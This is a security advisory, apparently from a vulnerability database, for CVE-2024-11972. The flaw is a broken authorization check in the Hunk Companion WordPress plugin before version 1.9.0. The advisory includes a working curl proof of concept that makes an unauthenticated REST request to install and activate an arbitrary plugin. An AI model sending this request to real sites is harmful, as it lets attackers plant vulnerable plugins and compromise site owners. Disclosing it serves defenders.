Hunk Companion < 1.9.0 – Unauthenticated Plugin Installation | CVE 2024-11972

Description

The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.

This was previously reported (https://www.cve.org/CVERecord?id=CVE-2024-9707) and a patch was released in version 1.8.5, however, the vulnerability was not fixed correctly.

Proof of Concept

1. Install and activate a ThemeHunk theme such as Almaira Shop (https://wordpress.org/themes/almaira-shop/) on your site

2. Make the request to the vulnerable HUNK Companion endpoint (you should get a 200 response):

curl http://example.com/wp-json/hc/v1/themehunk-import -H 'Content-Type: application/json' --data '{"params":{"templateType":"free","plugin":{"wp-query-console": "WP Query Console"},"allPlugins":[{"wp-query-console": "wp-query-console/wp-query-console.php"}]},"headers":{"X-WP-Nonce":"nunya"}}'

3. Confirm that the `wp-query-console` plugin is installed and activated